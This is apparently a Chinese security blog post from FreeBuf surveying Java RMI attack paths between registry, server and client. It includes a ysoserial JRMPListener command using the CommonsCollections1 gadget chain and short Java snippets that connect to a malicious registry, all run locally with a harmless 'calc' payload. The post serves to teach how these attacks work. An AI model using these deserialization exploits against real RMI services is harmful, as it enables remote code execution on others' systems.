freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

java安全:02RMI攻击方式盘点
2022-03-31 11:27:33
所属地 浙江省

基础知识

动态代理

反射

攻击方式

注册端攻击服务端

java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {
//开启一个恶意的reg,然后server去过去链接注册,则会中招
String url = "rmi://127.0.0.1:1099/setUser";
Naming.unbind(url);
}

1648695320_6245181877c352ef0e1f0.png!small

注册端攻击客户端

public static void main(String[] args) {
//PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
try{
String url = "rmi://127.0.0.1:1099/exp";
User user = (User) Naming.lookup(url);

}catch(Exception e){
e.printStackTrace();
}
}

服务端攻击注册端

1、注册端开启

1648695585_624519215f69813a7526e.png!small

2、Server端利用CC1进行攻击

img

1648696787_62451dd3b1ef9a371e7f8.png!small

服务端攻击客户端

1、服务端将恶意类注册

1648696839_62451e0741369ddf10b06.png!small

2、客户端加载执行

1648697120_62451f200b513d1eb8811.png!small

# java
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者